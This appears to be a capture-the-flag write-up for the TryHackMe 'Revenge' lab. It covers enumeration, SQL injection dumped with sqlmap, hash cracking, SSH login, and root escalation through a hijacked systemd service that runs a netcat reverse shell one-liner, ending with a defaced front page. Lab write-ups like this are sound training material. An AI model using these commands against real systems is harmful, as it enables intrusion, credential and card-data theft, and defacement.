TryHackMe - Revenge
You’ve been hired by Billy Joel to get revenge on Ducky Inc…the company that fired him. Can you break into the server and complete your mission?
Created by Nameless0ne
This is revenge! You’ve been hired by Billy Joel to break into and deface the Rubber Ducky Inc. webpage. He was fired for probably good reasons but who cares, you’re just here for the money. Can you fulfill your end of the bargain?
There is a sister room to this one. If you have not completed Blog yet, I recommend you do so. It’s not required but may enhance the story for you.
All images on the webapp, including the navbar brand logo, 404 and 500 pages, and product images goes to Varg. Thanks for helping me out with this one, bud.
Please hack responsibly. Do not attack a website or domain that you do not own the rights to. TryHackMe does not condone illegal hacking. This room is just for fun and to tell a story.
Flag 1
sends us a note. Let’s look at what says to us.
He gives us a mission
. We must penetrate a server
and change the front page
Let’s begin
First, let’s do a Nmap
scan to gather information about the target.
$ nmap -sSCV
As you can see 22/tcp and 80/tcp
ports are open.
Let’s explore the website.
Here is a homepage
Let’s do a gobuster
$ gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html,txt
We found a lot of pages. Let’s explore all of them.
Upon examining the page, we don’t find anything particularly interesting.
It looks like there are four products
Let’s examine these products.
We discover an endpoint (/product/1)
that could be vulnerable to SQL injection
To confirm this, we modify the endpoint to /product/2-1
and check if we are still on the /product/1 page
Indeed, the page is vulnerable to SQL injection.
Let’s do a sqlmap
$ sqlmap -u http:/ --dbs
We found the duckyinc database
. Let’s examine this database.
$ sqlmap -u http:/ -D duckyinc --tables
Let’s dump system_user
$ sqlmap -u http:/ -D duckyinc -T system_user --dump
We find three users
and their corresponding hashes
Let’s dump the user table
$ sqlmap -u http:/ -D duckyinc -T user --dump
Well done!
We find the first flag
which happens to be Mandrews' credit card number
Flag 2
Now, let’s crack the all hashes
$ john --wordlist=/usr/share/wordlists/rockyou.txt allhash.hash
We find two passwords
. One for the server-admin
and another for the dgorman
We try to use these passwords on the login and admin pages
, but they don't work
Let’s try these on ssh
$ ssh server-admin@
Yes, it is work. We are in the server now.
Let’s get the flag 2
Flag 3
Hint: Mission objectives
Now, we need to escalate our privileges
. We start by running the sudo -l
Which shows that we can execute duckyinc.service
with root privileges. We examine the contents of this file.
$ sudoedit /etc/systemd/system/duckyinc.service
We need to change this file.
First, let’s create a
and write in this code. (Making Sure to Change the IP and Port
as Necessary)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f
Let’s change the content of the duckyinc.servise
ExecStart=/bin/bash /home/server-admin/
Now we need it set up a netcat listener
. Then we can run
the duckyinc.service.
Success! We now have root access
the mission. We must change the front page
for the root flag.
I changed the index.html
location on the server.
$ mv /var/www/duckyinc/templates/index.html
Now, we can get the root flag
We have successfully completed the steps to find all the flags. It was nice CTF. I hope you learned something and had fun. But that’s it for now till next time take care